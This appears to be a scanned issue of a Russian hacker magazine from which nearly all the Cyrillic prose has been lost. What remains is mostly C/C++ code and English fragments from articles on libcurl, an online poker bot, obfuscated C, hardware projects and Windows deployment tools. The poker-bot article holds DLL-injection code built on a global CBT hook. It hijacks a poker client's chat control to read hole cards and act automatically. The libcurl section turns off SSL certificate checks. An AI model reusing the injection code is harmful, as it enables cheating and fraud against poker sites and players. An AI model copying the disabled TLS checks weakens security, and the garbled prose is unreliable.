if( ( cl = LoadLibrary( "libcurl.dll" ) ) ==
NULL )
\\
MessageBox(NULL, "I cant load
libcurl","ERROR", 0);
\\
FreeLibrary(cl);

libcurl?
API- , libcurl-
easy- (
http://curl.haxx.se/libcurl/c, ,
).

curl/ curl.h #include <curl/curl.h.
libcurl.dll easy- .
easy-
libcurl
\\
CURL*(__stdcall *curl_easy_init)();
CURLcode(__stdcall *curl_easy_setopt )

(CURL *curl, CURLoption option, ...);
CURLcode (__stdcall *curl_easy_perform )

(CURL *curl);
CURLcode(__stdcall *curl_easy_getinfo )

(CURL *curl, CURLINFO info, ...);
void (__stdcall *curl_easy_cleanup)

(CURL *curl);
struct curl_slist *(__stdcall
x 01 /121/ 09

html-
libcurl


*curl_slist_append )

(struct curl_slist *list,

const char *string);
void (__stdcall *curl_slist_free_all)

(struct curl_slist * list);
\\ DLL
curl_easy_init = (CURL*(__stdcall*)())

GetProcAddress(cl, "curl_easy_init" );
curl_easy_setopt =(CURLcode(__stdcall *)

(CURL *curl, CURLoption option, ...))
GetProcAddress(cl,"curl_easy_setopt");
curl_easy_perform =( CURLcode(__stdcall *)

(CURL *curl))GetProcAddress(cl,

"curl_easy_perform");
curl_easy_cleanup =(void (__stdcall *)(

CURL *curl))GetProcAddress(

cl,"curl_easy_cleanup");
curl_easy_getinfo=(CURLcode(__stdcall *)

(CURL *curl, CURLINFO info,

...))GetProcAddress(cl,

"curl_easy_getinfo");
curl_slist_append = (curl_slist*(__stdcall *)

(struct curl_slist *list,

const char *string))GetProcAddress(

cl,"curl_slist_append" );
curl_slist_free_all=(void(__stdcall *)

(struct curl_slist list))

GetProcAddress (cl,

"curl_slist_free_all");

,
,
. ,
, .


libcurl

links


cURL http://curl.
haxx.se.

info
CURL

PHP

!

093

>> coding

curl_easy_init
libcurl. !
, , URL libcurl
. ,
easy-, :
html-
//
CURL *curl;
// html-

String table;
//
curl = curl_easy_init();
if(curl) {
//

curl_easy_setopt(curl,

CURLOPT_WRITEFUNCTION, Writer);

//

//

curl_easy_setopt(curl, CURLOPT_WRITEDATA,

&table);

// URL

curl_easy_setopt(curl, CURLOPT_URL,

"http://www.xakep.ru/");

// (1- ; 0

)

curl_easy_setopt(curl, CURLOPT_HEADER , 1 );

//

curl_easy_perform(curl);

//

curl_easy_cleanup(curl);
}

, html-
http://www.xakep.ru . table.
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,Writer). (http://curl.
haxx.se/libcurl/c/curl_easy_setopt.html ,
curl_easy_setopt).
, CURLOPT_WRITEDATA
( ).
DLL Win32, .
curl_easy_setopt(curl, CURLOPT_
WRITEFUNCTION,Writer). , :

094


static size_t Writer(char *data, size_t size,

size_t nmemb, AnsiString *buffer)
{
size_t result = 0;
if(buffer != NULL) {
buffer->Insert(data,buffer->Length()+1);
// buffer
result = size * nmemb;
//

}
return result;
}

,
char *data result
(result = size * nmemb). ,
, , . ,
buffer,
. ,

Memo1->Text= table;
curl_easy_perform.
Memo1 HTML- .


libcurl Builder C++
,
,
.
, libcurl,
HTTP-. :
;
HTTP 1.1
//
curl_easy_setopt(curl, CURLOPT_USERAGENT,

"Mozilla/5.0 (Windows; U; Windows NT 5.1;

en-US; rv:1.8.1.1) Gecko/20061204

Firefox/2.0.0.1");
// , x 01 /121/ 09

>> coding

HTTP- xakep.ru

, HTTP 1.1
curl_easy_setopt(curl,

CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);

, curl_easy_setopt
curl_easy_perform (
). , libcurl (, ,
SmartSniff) .
User-Agent
HTTP 1.1. ,

cURL .
libcurl HTTPS-,
http- , ,
COOKIES. :
// http-
curl_easy_setopt(curl,CURLOPT_PROXY,

"x.x.x.x:yyyy");
curl_easy_setopt(curl, CURLOPT_PROXYUSERPWD,

"user:123");
// cookies
curl_easy_setopt(curl, CURLOPT_COOKIEJAR,

"outfile.txt");
curl_easy_setopt ( curl, CURLOPT_COOKIEFILE,

"outfile.txt" );
// https-
curl_easy_setopt(curl,

CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl,

CURLOPT_SSL_VERIFYHOST, 0L);

,
. curl_easy_setopt,
, IP- - ,
.
curl_easy_setopt CURLOPT_PROXY. -
.
CURLOPT_PROXYUSERPWD -, . ,
curl_easy_setopt CURLOPT_PROXYTYPE;
( HTTP-). ,
cookies.
CURLOPT_COOKIEJAR ,

curl_easy_cleanup, ,
cookies
. CURLOPT_COOKIEFILE , , ,
cookies libcurl. ,
cookies, libcurl . ,
x 01 /121/ 09

,
cookies .
HTTPS- .
CURLOPT_SSL_VERIFYPEER
CURLOPT_SSL_VERIFYHOST, , , . 0,
.

,
CURLOPT_HTTPHEADER.
struct curl_slist. struct
curl_slist
curl_slist_append, curl_slist_free_all
( : http://curl.haxx.se/libcurl/c/curl_slist_append.
html). ,
. ,
easy- 2.
:
curl_slist_append
curl_slist_free_all
//
struct curl_slist *(__stdcall *curl_slist_append )
(struct curl_slist *list, const char *string);
void (__stdcall *curl_slist_free_all)(

struct curl_slist * list);
//
DLL
curl_slist_append=(curl_slist*(__stdcall *) (

struct curl_slist *list,const char *string))

GetProcAddress(cl,"curl_slist_append" );
curl_slist_free_all=(void(__stdcall *)(

struct curl_slist *list)) GetProcAddress(

cl,"curl_slist_free_all");

, ,
. ,
. ,
POST. CURLOPT_POST 1 POST-.
CURLOPT_POSTFIELDS post-.
POST-
// POST-
curl_easy_setopt(curl, CURLOPT_POST, 1);
// POST-
curl_easy_setopt(curl, CURLOPT_POSTFIELDS,

"journal=Hacker");

GET
URL ? ,
&.

,
DLL libcurl Builder C++. ,

cURL,
. , .
, . . .z

095

>> coding

/ baiborodin@gmail.com /

NOTEPAD.EXE

PHOTOSHOP.EXE

POKERSTARS.EXE

IEXPLORE.EXE

XYZ.DLL

XYZ.DLL

XYZ.DLL

XYZ.DLL

INJECT.DLL

INJECT.DLL

INJECT.DLL

INJECT.DLL

POKERBOT.DLL

, ,

Aaloha, ! . , , , .
.
,
online-.

? ? ,
, , , .
, , ,
, . BlackJack ,

. ! , BlackJack,
. , .
, .
: ,
.

096

, -
. , , ,
. , .
.

.
,
. , .
, , .
, .
x 01 /121/ 09

>> coding
Target
Process
Your Bootstrap DLL
(C++)

loads

dvd

.NET Runtime
loads calls

Your
Process


,

,



.

Your Bootstrap DLL


Your Managed
Assembly
(.NET)

links
,
, nline -,
. ,
-,
, , ,
.
, -
- ( ).
(PokerStars
1 ), , ,
. ,
?
, !
- ,
. .
,
.
. , , , .
, ,
.
,
?
, .
, .
, ,
. ,
- , ,
. ,
,
90% .

. ,

. !
! , ?
, ,

? , .
x 01 /121/ 09


,
, . , ,
.
. , , SSH-.

( , )
,
WebMoney,
, .
? .
online
-, ,

, ,
, , , ,
!
, ,
.
, .

.


DLL-. .Net
Windows,
.Net-.
, ,
-.
- .
.Net. , ,
:
namespace MyNamespace
{
public class MyClass
{
// -


online . ,
: www.
pokerstars.com.
Full Tilt Poker

PokerStars online
-: www.
fulltilt.com.


2+2,


-: forumserver.
twoplustwo.com.
Windows
Hook MSDN: msdn.
microsoft.com/enus/library/ms997537.
aspx .

warning




.

,

. :).

097

INJECT.DLL

>> coding

HOTOSHOP.EXE

POKERSTARS.EXE

XYZ.DLL

XYZ.DLL

XYZ.

INJECT.DLL

INJECT.

JECT.DLL

INJECT

IEXPLORE.EXE

POKERBOT.DLL

MS Spy++

public static int MyMethod(String pwzArgument)


{
MessageBox.Show("Hello World");
return 0;
}
}

hr = pClrHost->Start();
// .Net
DWORD dwRet = 0;
hr = pClrHost->ExecuteInDefaultAppDomain(
L"c:\\PathToYourManagedAssembly\\
MyManagedAssembly.dll",
L"MyNamespace.MyClass", L"MyMethod",
L"MyParameter", &dwRet);

,
.

, .Net.
, - , , . . !

. DLL,
.Net
.

DLL-:
#include "MSCorEE.h"
void StartTheDotNetRuntime()
{
// CLR
ICLRRuntimeHost *pClrHost = NULL;
HRESULT hr = CorBindToRuntimeEx(
NULL, L"wks", 0, CLSID_CLRRuntimeHost,
IID_ICLRRuntimeHost, (PVOID*)&pClrHost);

(
,
),
. ,
,
.
(
)
.

098

// CLR
hr = pClrHost->Stop();
//
pClrHost->Release();
}

CLR API.
1. CorBindToRuntimeEx
ICLRRuntimeHost.
2. ICLRRuntimeHost::Start CLR Runtime
.
3. ICLRRuntimeHost::ExecuteInDefaultAppDomain
CLR .

, , , . ,
.
, , , ,
ExecuteInDefaultAppDomain ,
integer. , ,
?
ExecuteInDefaultAppDomain . ,
. ,
.Net-,
,
.
MSDN.
.
? , ,
DLL, .
-.

x 01 /121/ 09

T.DLL

INJECT.DLL

INJECT.DLL

>> coding
POKERBOT.DLL

NOTEPAD.EXE

PHOTOSHOP.EXE

POKERSTARS.EXE

XYZ.DLL

XYZ.DLL

XYZ.DLL

Full Tilt Poker.

, !
DLL-, -. DLL Injection?, .
. - , .
,
.
, , . DLL
Injection , .
DLL Injection .
( ).
,
.
, DLL Injection ,
. , ,

. ,
, ,
. Windows Hook CBT Hook. MSDN Windows Hook,
, SetWindowHookEx
Windows API. ,
:
LRESULT CALLBACK PokerBotCBTProc(int nCode,
WPARAM wParam, LPARAM lParam)
{
if (nCode < 0)
{
return CallNextHookEx(g_hHook, nCode,
wParam, lParam);
}
else if (theInjector.getVenue() !=
Venue_Unknown)
{
if (g_bFirstTime)
{
theInjector.inject();
bFirstTime = false;
}
if (nCode == HCBT_ACTIVATE)
return (LRESULT) theInjector.HandleIt
(Hook_Activate, (HWND)wParam);
else if (nCode == HCBT_CREATEWND)
x 01 /121/ 09

PokerStars

IEX

IN

return (LRESULT) theInjector.


HandleIt(Hook_Create, (HWND)wParam);
else if (nCode == HCBT_DESTROYWND)
return theInjector.HandleIt(Hook_Destroy,
(HWND)wParam);

POKERBOT.DLL

}
return 0;
}
bool OPCHOOK_API InstallHooks()
{
g_hHook = SetWindowsHookEx(WH_CBT, (HOOKPROC)
AutoCBTProc, hInstance, 0);
return g_hHook != NULL;
}

CBT-
( , ). DLL
.
Hello, World! ( ,
), .
: ,
, .
online -,
, .


, . DLL Injection:
bool XPOKERBOTHOOK_API InstallHook()
{
g_hHook = SetWindowsHookEx(WH_CBT,
(HOOKPROC) CBTProc, g_hInstance, 0);
return g_hHook != NULL;
}

-:
LRESULT CALLBACK CBTProc(int nCode,
WPARAM wParam, LPARAM lParam)
{
if (nCode < 0)
return CallNextHookEx(g_hHook, nCode, wParam,

099

EXE

>> NOTEPAD.EXE
coding

PHOTOSHOP.EXE

POKERSTARS.EXE

IEXPLORE.EXE

XYZ.DLL

XYZ.DLL

XYZ.DLL

XYZ.DLL

INJECT.DLL

INJECT.DLL

INJECT.DLL

INJECT.DLL

POKERBOT.DLL

PHOTOSHOP.EXE

POKERSTARS.EXE

IEXPLORE.EXE

XYZ.DLL

XYZ.DLL

XYZ.DLL

Full Tilt Poker

lParam);
else if (!g_pClient)
return 0;
HWND hWnd = (HWND)wParam;
if (!hWnd)
return 0;

INJECT.DLL
INJECT.DLL

POKERBOT.DLL

if (nCode == HCBT_ACTIVATE)
{
if (!g_pClient->IsRegisteredWindow(hWnd))
g_pClient->TryRegisterWindow(hWnd, NULL);
}
else if (nCode == HCBT_DESTROYWND)
{
if (g_pClient->IsRegisteredWindow(hWnd))
g_pClient->UnregisterWindow(hWnd);
}
return 0;

}
.
HCBT_ACTIVATE. , HCBT_DESTROYWND.
. -
. , .
HCBT_CREATEWND
, .
,
. , HCBT_CREATEWND .
HCBT_ACTIVATE
. , ,
.
, EM_STREAMING,
callback .
, .
. , ,
, .
, , ,
.

100

, . , .
:
PokerTimeTableWindow::PokerTimeTableWindow
(HWND hWnd, PokerTimePokerClient* client) :
OnlineTableWindow(hWnd, client)
{
HWND hwndChat = ::FindWindowEx(hWnd, NULL,
_T("RichEdit20W"), NULL);
if (hwndChat)
{
PokerTimeTableWindow::OldRichWndProc =
(WNDPROC)::GetWindowLongPtr(hwndChat,
GWL_WNDPROC);
::SetWindowLongPtr(hwndChat, GWL_WNDPROC,
(LONG_PTR)PokerTimeTableWindow::MyRichWndProc);
}
}

, , .
,
. , , PokerTime, RichEdit.

EM_STREAMIN, :
LRESULT PokerTimeTableWindow::MyRichWndProc
(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
EDITSTREAM* es = (EDITSTREAM*) lParam;
if (msg == EM_STREAMIN)
{
PokerTimeTableWindow::OldRichEditCB =
es->pfnCallback;
es->pfnCallback =
PokerTimeTableWindow::MyEditStreamCallback;
PokerTimeTableWindow::CurrentChatWindow = hWnd;
}
LRESULT lRet = ::CallWindowProc(
x 01 /121/ 09

NOTEPAD.EXE

PHOTOSHOP.EXE

POKERSTARS.EXE

IEXPLORE.EXE

XYZ.DLL

XYZ.DLL

XYZ.DLL

XYZ.DLL

INJECT.DLL

INJECT.DLL

INJECT.DLL

INJECT.DLL

>> coding

POKERBOT.DLL

NOTEPAD.EXE

PHOTOSHOP.EXE

XYZ.DLL

XYZ.DLL

INJECT.DLL

INJECT.DLL

POKERSTAR

XYZ

2+2

PokerTimeTableWindow::OldRichWndProc,
hWnd, msg, wParam, lParam);
if (msg == EM_STREAMIN)
{
es->pfnCallback =
PokerTimeTableWindow::OldRichEditCB;
}
return lRet;

string sCard2 = what[2];


ApplicationProxy::TransmitHoleCards
((sCard1 + sCard2).c_str(), hPokerTable);
}
else if (boost::regex_match(line, what,
regWakeUp,
boost::match_default|boost::match_single_line)
&& what.size() == 3)
{
string theActor = what[1];
if (theActor == g_pClient->LoggedInAs)
OnlinePokerExecutor::PerformAction(
hPokerTable);
}

EM_STRAEMING,
, callback- EDITSTREAMCALLBACK. callback () ().
, ,
:).
PokerTimeTableWindow::OldRichEditCB =
es->pfnCallback;
es->pfnCallback =
PokerTimeTableWindow::MyEditStreamCallback;


,
, . ,
, :
Dealing Hole Cards (Ah, Ad) (
);
Meowt, you have 10 seconds to respond ( , ).
:
DWORD CALLBACK PokerTimeTableWindow::MyEditStrea
mCallback(DWORD_PTR dwCookie, LPBYTE pbBuff, LONG
numberOfBytes, LONG* actualBytes)
{
DWORD dwRet = PokerTimeTableWindow::OldRichEditCB
(dwCookie, pbBuff, numberOfBytes, actualBytes);
if (0 == dwRet && actualBytes && *actualBytes > 0)
{
boost::smatch what;
if( boost::regex_match(line, what, regHoleCards,
boost::match_default|boost::match_single_line) && what.
size() == 3)
{
string sCard1 = what[1];
x 01 /121/ 09

INJEC

POKERB

}
}

.
, ,
.
, .

!
, , . .
( , ),
. .
, -
, -. , .
. , . ,
, . . , , .
:
1. ,
.
2. . .
3. (, , ),
.
, .
, !z

101

>> coding

20h:

, brainfuck, .
, . ,
.

01

, ,
, , MASM,
. ,
, .
. ,
.
:

Twas the night before Christmas
And all through the house
Not a creature was stirring
Not even a mouse
The stockings were hung
By the chimney with care
In hopes that Saint Nicholas
Soon would be there

, , . ,
( ).
( ),
, .

#define Twas int
#define the
#define night main()
#define before {
#define Christmas int number, rightDigit, sign = 0;
#define And
#define all printf("Enter your number: ");
#define through scanf("%d", &number);
#define house if (number < 0)
#define Not
#define a
#define creature {

102

#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define

was number = -number;


stirring sign = 1;
even }
mouse do
The {
stockings rightDigit
were = number
hung %
By 10;
chimney printf("%d", rightDigit);
with number /=
care 10;
In }
hopes while
that (number);
Saint if (sign)
Nicholas puts("-");
Soon else
would putchar(\n);
be return 0;
there }

,
, . ,
, ,
(and, a, the)
. , . ,

( MS VC /P),
. ( , ?), .
, ( ),
.
, ,
. , , , .
, ! , ,
x 01 /121/ 09

>> coding
, ,
, .
/* (c) Brian Westley, 1988 */
#define _ 0xF<00? --F<00||--F-OO--:-F<00||--F-OO--;
int F=00,OO=00;
main(){F_OO();printf("%1.3f\n",4.*-F/OO/OO);}F_OO()
{
_-_-_-_
_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_
_-_-_-_
}

02


, , .
. , ,
, . , ,
1 -+- + -+- 1, .

foo(int a){printf("%d\n",a);};main(){foo(
+- -+- -+- -+
////////////.!
////////////./!
////////////.//!
////////////.///!
+ -+- -+- +////!
!!!!!~~!!!!!!////!
!!!!~~!~!!!!!////.
!!!~~~~~~!!!!/////
!!~~!~~!~~!!!////
!~~!!~~!!~~!!///
~~!!!~~!!!~~!//
1 -+- -+- 1
);
}

? ,
, . ,
,
. ,

03


,
. ,
,
x 01 /121/ 09

, .
:
/* (c) Jack Applin and Robert Heckendorn, 1985 */
main(v,c)char**c;{for(v[c++]="Hello, world!\n)";
(!!c)[*c]&&(v--||--c&&execlp(*c,*c,c[!!c]+!!c,!c));
**c=!c)write(!!*c,*c,!!**c);}

, ?
, Hello, world,
. , Hello,
world!
.
, 128
Microsoft Visual C++ 128 . !
, , ( 1985 ,
, ), .
! ,
, execlp(). ,
- ,
, . ,
, , , .
,
,
, .

-,

. HexRays, , , HexRays , , .
Hex-Rays ,
. , ,
,
, (
) , . ,
,
,
, ,
,
.
, , ,
, , :
int __cdecl main(int argc, char **argv, char *envp) {
int res; int v4; bool v5; char **v6; int v7; v4 = argc;
argv[argc] = "Hello, world!\n)";
v6 = (char **)(argv + 1);
res = argv + 1 != 0; v5 = argv + 1 != 0;
if ( (*(argv + 1))[res]) {
do {
v7 = v4--; if ( !v7 ) {
--v6; if ( !v6 ) break;
v5 = 1; res = _execlp(*v6, (char)*v6);
if ( !res) break;
} _write(*v6 != 0, *v6, **v6 != 0);
res = (int)*v6; **v6 = v6 == 0;
} while ( (*v6)[v5] );
} return res;
}z

103

>> phreaking
Vshmuk
/ diver@edu.ioffe.ru /

>>
- -
, , - ,
. , ,
, .

, -, -, ,
, ,
, , .
,
. , , .
. , , , , ,
. ,
:), .
? -, - ()
. , , , .
.
, , .
, .

104

. , .
,
,
, .
, , ,
. .
, .
, , .
(
) ( 20 ) ,

, .
, .


, , -,
USB- .
, ,
x 01 /121/ 09

>> phreaking
( , ), ,
.
, , ,
; () ,
, 5 , -30. 35 . .

.
, .
, ,
,
. ,
, , , .

, geolab.ioffe.net,
,
.
:
(, )
george@switch.ioffe.ru
(gui, ) idfred@gmail.com


, (4
, 1 1 ), USB.
,
, . , GTK+ 2.0/OpenGL libusb, .
(,
),
,
.

?
, ,
,


,
.

. p- n- ,
. ,

,
. .
x 01 /121/ 09

. ,
, ,
. ,
.
MOSFET- (MOSFET Metal
Oxide Semiconductor Field Effect Transistor) ,
( Di_Halta
, . ).
- ,
.
. MOSFET-
, , .
. , ,
. ,
, ! , , . , ,

ARM Advanced
Risc Machines
RISC- (Reduced
Instruction Set Computing),
.
- , ARM . ARM- :
.
.

105

>>
>> pc_zone
phreaking

...
.
-, ( , ) .

.
----.
Analog Devices (, !)
(- )
. ,
. -,
copy-paste . ,
.

. , , .
. ,
- ()
.

106

C -

. ,
,
.
.
: Atmel AT91SAM7X (,
AVR, ARM!), Altera Cyclone, ,
, -,
.
. Altera , ,
, ,
, ,


- .
( , 2,5 ) ,
.
,
- .
,
.
.
, ,
.
x 01 /121/ 09

>>>>phreaking
pc_zone


, . . (USB
COM-), ,
Alter- .

, , . ,
, ,
. ( !) , ,
.
, .

,
, , p-n .
x 01 /121/ 09

- .
,

: , . , 200 .
? ,
(, http://ru.wikipedia.org/wiki/ +
).
P.S. . z

107

>> phreaking
Vshmuk
/ diver@edu.ioffe.ru /


>>
, -. ,
, , , , , . ,
? ,
? , .

,
, - . , .

, .

, ,
, , , , .
,
, .

,
:
, ;
, ;
, .

108

, , . ?
, ,
8. .
. .
,
400 . ,
, , ,
. .
, , ,
.
.


, .
- - ,
x 01 /121/ 09

>> phreaking

.
.
, LC-,
( ) .
,
8,2 .
, . , .
, , -

, . ,
. :).
, (
-, ), ,
, .
, , LC- . ,
, , , .
,
, , , , .

.
8,2 , .

, , .
, : ,
x 01 /121/ 09

, .
9 , Altera MAX II.
!
. ,
8,2 . ,
200-400 . ,
, 9
, . ? , .
9 , 300. ,
1 30. ,
, , ,
, .
2,5 . .
9
. ,
,
300 . - . MOSFET,
, ,
, . , , ,

,
9 ! ,
, ,
. MOSFET LM7313,
- .
, - .
, , -

109

>>
>> pc_zone
phreaking



,
( , ).
,
.
,
, .
.

,
.
, ,
.
.
( )
. .
. -



, ,
- .

, , .

. , ,
. ,

. ,
, .
,
. 127,6 , -
. , .
, :
http://www.antentop.org/004/files/tr004.pdf :
http://www.educypedia.be/electronics/electroniccalculators.htm,
. ,
, javascript electronic
inductance calculator, .
, ,
.

110


,
200 ,
. .
, -.
8,2 , . ,
-

-
- - ,
. . ,
.
, -, , .
, ,
NdFeB-, ,
!
: http://www.
patentgenius.com/patent/5528914.html.
x 01 /121/ 09

>>>>phreaking
pc_zone

! .
, , . ,
.
, !

. !

PS
, ,
. ,
,
. ,
, .

?

.
,
.
,
.
, ,
. (
)
,
. ,
,
.
! ,
!
x 01 /121/ 09

- .


.
- .
, -, .
(,
z!) .
, ,
.
, . , ,
. z

111

>> SYN/ACK
grinder
/ grinder@ua.fm, tux.in.ua /

WAIK: Windows

Windows . , . , ,
, . ,
.
WAIK
Microsoft Windows (AIK), . ,
Windows,
Vista Windows Server 2008. WAIK
:
Microsoft Windows Preinstallation Environment (WinPE) Vista, ;
WAIK, ImageX Windows;

112

Windows Deployment Services (WDS) , RIS;


.
ImageX WIM
(Windows Image) , (Windows System
Image Manager)
. ,
Windows.
? ! ,
,
. , -

x 01 /121/ 09

>> SYN/ACK

WIM-
WAIK

, WAIK.
(AIK) Windows Vista
1 (SP1) Windows Server 2008.
. ,
Windows AIK, Windows,
WinXP SP2.

WAIK . ,
,
WDS (Windows Deployment Services). ,
, !
nLite
(www.nliteos.com). ( Vista)

, , ,
.
DVD- WAIK,
Windows AIK, . C:\Program
Files\Windows AIK. , WAIK 1.1
( , ).
, , ,
ISO- .
, . , Windows PE,
WAIK.
. Windows (Windows System Image Manager, Windows SIM).


, ImageX
. -, , ,
Windows SIM :).
, , , D:\Temp. , WIM-
NTFS.
2 / (, ) FAT32. Sources DVD- install.wim
. WinPE D:\Temp:
PETools> imagex /mountrw d:\install.wim 1 d:\temp
Mounting (RW): [d:\install.wim, 1] -> [d:\temp]

x 01 /121/ 09

/mountrw .
, /mount. : , imagex . /?, .
WinXP SP2, Win2k3 SP1 Vista.
WIM-
WIM FS (Windows Imaging File System Filter).
, , .
WAIK. Tools\x86 ( ia64, Vista), wimfltr.inf .
, , 1 .
, Vista Win2k8 ,
.
, . , /INFO imagex.
PETools> imagex /INFO d:\install.wim

<IMAGE INDEX="1">
<NAME>Windows Vista BUSINESS</NAME>

<IMAGE INDEX="2">
<NAME>Windows Vista HOMEBASIC</NAME>

, 1 Business, 2 HomeBasi ..
, , , , Vista Program Files,
Windows ,
.
,
( MSU) peimg.
. , /inf.
inf- (, d:\
driver), :
PETools>
windows

peimg

/inf=d:\driver\*.inf

/image=d:\temp\

, . , , .
MSU .
expand MSU-. :
expand.exe < MSU> -F:* < >.
'-F' , . -

113

>> SYN/ACK

WIM- GImageX

nLite

.
. :
PETools> expand Windows6.0KB957055x86.msu F:* d:\update

info
Oobe.xml


,

Windows,


.

Samples.

Windows
Deployment Services
z_06_2007.

d:\update
: cab, xml . cab-:
PETools> peimg d:\temp\windows /import=d:\
update\Windows6.0KB957055x86.cab

, .
/install:
PETools> peimg /install=Windows6.0KB957055x
86.cab d:\temp\windows

, , .
.
/list:
PETools> peimg /list /image=d:\temp\windows

, ,
.
, , , /commit :

warning


NTFS.

114

PETools> imagex /unmount /commit d:\temp

, , GImageX (www.autoitscript.com/
gimagex), ImageX. GImageX
WIM , ,
. -

Vista Update Integrator (www.winvistaside.


de/downloads/systemtools) WIM- , ,
, ISO.
Microsoft .NET Framework 3.5.


, , . , ,
,
. , ,
,
, , ,
IE .. .
Windows
.
Vista XML-
,
, .
Unattend.xml. Samples, , WAIK,
.

clg (Windows catalog) .
Sources .
,
. clg Vista (Setup
Manager) (Image Manager).
, .
, Windows (Windows Image) install.wim,
.
. clg-
, ;
, .
,

.

x 01 /121/ 09

>> SYN/ACK

(New Answer File).


,
. (Answer File)
Components Packages. Components Vista, (IE, Media Player ..). (windowsPE, offlineServicing, generalize, specialize, auditSystem,
auditUser oobeSystem). Packages ,
: , , ,
.
.

Windows (Windows Image). ,
. ,

.
,
, ,
.

. , .

Windows
,
x86_MicrosoftWindows-Setup ( ,

x 01 /121/ 09

).
, , .
, ,
Add Setting to Pass 4 specialize (
). . ,
, .
, ,
.
.
UserData, ProductKey.
, Key, ,
WillShowUI
Never. . UserData AcceptEula True .
XML- :
<UserData>
<ProductKey>
<Key>xxxx-xxxx-xxxx-xxxx</Key>
<WillShowUI>OnError</WillShowUI>
</ProductKey>
<AcceptEula>true</AcceptEula>
</UserData>

115

>> SYN/ACK

links
vLite
(www.vlite.net)


Windows.
GImageX
www.autoitscript.
com/files/gimagex/
gimagex.zip.
Vista Update
Integrator (www.
winvistaside.
de/downloads/
systemtools)
,

WIM- ,
, ,
ISO.
Vista Unattended
XML Creator

dc412.
org/unattend.php.

oobeSystem (Outof-Box-Experience)
technet.microsoft.
com/en-us/library/
cc748990.aspx.

OSzone
oszone.net/2985_3.
Windows
AIK
Microsoft.

FullName Organisation .
, DiskConfiguration.
, Disk. Disk.
CreatePartitions
CreatePartitions.
Extend, Order, Size Type
.
.
IE x86_
Microsoft-Windows-InternetExplorer.
, . , UserAgent .. ,
, . ,
, StartPages
StartPageUrl. URL.
Packages
Vista. , :
FeaturePack, Foundation, LanguagePack Product. Foundation Vista,
Product , , .
,
(Add
to Answer File), .
x86_Microsoft-WindowsFoundation-Package. , InboxGames, (
Enabled Disabled).
IIS, (,
telnet) .
, ,
,
. ,
. SYSTEM , :
windowsPE ( Windows) SYSTEM;
auditSystem SYSTEM;
auditUser ;
specialize SYSTEM;
oobetSystem SYSTEM.
, oobeSystem , . , systemdrive%\Hotfix\Windows6.0KB936330X
86wave1.exe. Hotfix
.
Description . XML-
:
<SynchronousCommand wcm:action="add">
<CommandLine>%systemdrive%\Hotfix\Windows6.0
KB936330X86wave1.exe/Q</CommandLine>
<Order>2</Order>
<Description>Hotfix</Description>
</SynchronousCommand>

,
,
:

116

Vista Update
Intergator
cmd /c "FOR %i IN (C D E F G H I J K L N M O P Q
R S T U V W X Y Z) DO IF EXIST %i:\AppsRoot.txt
SETX AppsRoot %i: m"


. , , . : , , .
- BS Post Installer (.
oszone.net/2985_3).

(Validate Answer File). ,
.
:
(Save
Answer File). , ,
-,
.
,
.
,
WIM- ( ,
USB-). oscdimq.exe
WAIK. Vista
d:\Vista, WIM-
.
:
PETools> scdimg -u2 -bd:\Vista\Boot\etfsboot.
com -lMyVista -h d:\Vista d:\MyVista.iso

'-u2' UDF, 'b' , '-l' ,


'-h'
.
Vista Update Integrator vLite (www.vlite.net).
, WAIK,
.

,
,
, ,
. z
x 01 /121/ 09

>> SYN/ACK


Win2k8 WSUS 3.0 SP1

WSUS
Microsoft.

, .
SUS/WSUS,
, Microsoft Update
Microsoft,
. Automatic Updates
( Win2k SP4, WinXP, Win2k3, Vista Win2k8) ,
- Microsoft Update,
. , :
. , Microsoft
. , (, ).
.


( SUS, Software
Update Services) 2002 . WSUS (Windows
Server Update Services) 2.0, .

118


.
2007 ,
32-, 64 . - MMC (Microsoft
Management Console). WSUS .
WSUS 3.0 (
). /
:
, ,
, .
,
.
WSUS 3.0 SP1 (
2008 ).
Vista Win2k8, ,
WMSDE (Microsoft SQL Server Desktop Engine) SP4,
, WSUS RTM.

x 01 /121/ 09

>> SYN/ACK

WSUS IIS

WSUS -


WSUS 3.0 SP1 , Win2k3 SP1, Win2k3 SBS (Small Business Server) Win2k8.

WinXP SP2
Win2k8. , ,
WSUS, . Win2k8
- IIS 7.0, . , .
- (IIS)
Windows. , . Windows
Authentication (Windows ), ASP.NET (
;
), IIS Management Compatibility ( IIS 6) Metabase Compatibility IIS 6 (
IIS 6). IIS. BITS 2.0 .NET Framework 2.0, Win2k3, Win2k8, .
Microsoft Report Viewer Redistributable 2005 (go.microsoft.com/fwlink/
?LinkID=70410).
WMSDE.
SQL- SQL Server 2005
SP2 (go.microsoft.com/fwlink/?LinkId=84823).
WSUS 3.0 RECURSIVE_TRIGGERS, SQL Server
. sp_configure,
:

. (, ).
Windows Update HTTP- HTTPS-,
. -,
, ,
.
64 , IIS . - IIS 32 , ,
, .
WSUS 3.0 Win2k8 IIS. , , - %WINDIR%\
system32\inetsrv\applicationhost.config. ,
<System.webServer> <modules> <add
name="CustomErrorMode">, <System.webServer>
<modules> <remove name="CustomErrorMode">.
, :

sp_configure 'nested triggers'

SQL Server
SSMS (SQL Server Management Studio). , SQL . , Microsoft SQL Server 2005 SQLCMD
(Microsoft SQL Server 2005 Command Line Query Utility),
SQL Server .
Microsoft.
, -, . WSUS , NTFS ( , ). 1 WSUS,
2 20

x 01 /121/ 09

<System.webServer>
<modules>
<remove name="CustomErrorMode">
</modules>
</System.webServer>


. , WSUS
Active Directory. , .
